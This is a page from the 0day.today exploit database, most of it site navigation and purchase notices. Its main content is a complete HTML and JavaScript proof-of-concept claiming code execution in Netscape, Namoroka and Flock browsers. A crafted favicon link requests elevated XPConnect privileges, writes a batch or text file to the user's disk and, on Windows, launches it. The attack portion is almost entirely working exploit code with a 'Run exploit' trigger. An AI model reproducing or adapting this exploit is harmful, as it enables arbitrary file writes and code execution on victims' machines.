0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Netscape Navigator - Namoroka - Flock <= URL Code Execution Exploit
=================================================================== Netscape Navigator - Namoroka - Flock <= URL Code Execution Exploit =================================================================== <html> <head> <title>firelinking By eidelweiss</title> <-- Copyright (C) 2009-2010 firelinking by eidelweiss --> <-- Greets: AL-MARHUM , [D]eal [C]yber , My Mother (i miss u) , and all my friends --> <-- This PoC is cross platform : On Windows this example creates the file --> <-- c:\mampus.bat and launches it (opens a dos box with a dir command). On --> <-- Linux (tested Fedora Core) the example creates the file --> <-- ~/mampus.txt Depending on caching the the script might --> <-- run twice in some cases (this will create an additional mampus-1.txt). --> <link rel="SHORTCUT ICON" href="favicon.ico"> <script language="JavaScript" type="text/javascript"> var pf = navigator.platform.toLowerCase(); if (pf.indexOf("win") != -1) { var os = "win"; } else if (pf.indexOf("linux") != -1) { var os = "linux"; } function GoFuck() { // this is a bad caching workaround inside document.getElementById('outhtml').innerHTML = ""; document.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value document.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value document.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value window.setTimeout("document.getElementById('outhtml').innerHTML += document.getElementById('linkhtml_"+os+"').value",300); } </script> </head> <body> <div style="font-family:Verdana;font-size:11px;"> <div style="font-family:Verdana;font-size:15px;font-weight:bold;">firelinking By eidelweiss</div> <br><br> <div style="width:600px"> <div id="outhtml" style="display:none"></div> <textarea id="clearhtml" style="display:none"> <link rel="SHORTCUT ICON" href="favicon.ico"> </textarea> <textarea id="linkhtml_win" style="display:none"> <link rel="SHORTCUT ICON" href="view-source:javascript:delayedOpenWindow(' javascript:netscape.security.PrivilegeManager.enablePrivilege(\'UniversalXPConnect\'); file=Components.classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces. nsILocalFile);file.initWithPath(\'c:\\\\mampus.bat\');file.createUnique(Components.interfaces. nsIFile.NORMAL_FILE_TYPE,420);outputStream=Components.classes[\'@mozilla.org/network/ file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputStream); outputStream.init(file,0x04|0x08|0x20,420,0);output=\'@ECHO OFF\\n:BEGIN\\nCLS\\nDIR\\n PAUSE\\n:END\';outputStream.write(output,output.length);outputStream.close();file.launch();','','')"> </textarea> <textarea id="linkhtml_linux" style="display:none"> <link rel="SHORTCUT ICON" href="view-source:javascript:delayedOpenWindow('javascript: netscape.security.PrivilegeManager.enablePrivilege(\'UniversalXPConnect\');file=Components. classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces.nsILocalFile);file. initWithPath(\'~/mampus.txt\');file.createUnique(Components.interfaces.nsIFile. NORMAL_FILE_TYPE,420);outputStream=Components.classes[\'@mozilla.org/network/ file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputStream); outputStream.init(file,0x04|0x08|0x20,420,0);output=\'mampus!\';outputStream.write (output,output.length);outputStream.close();','','')"> </textarea> <br><br> <a href="#" onclick="GoFuck();GoFuck();">Run exploit</a> </div> </body> </html> # 0day.today [2024-11-15] #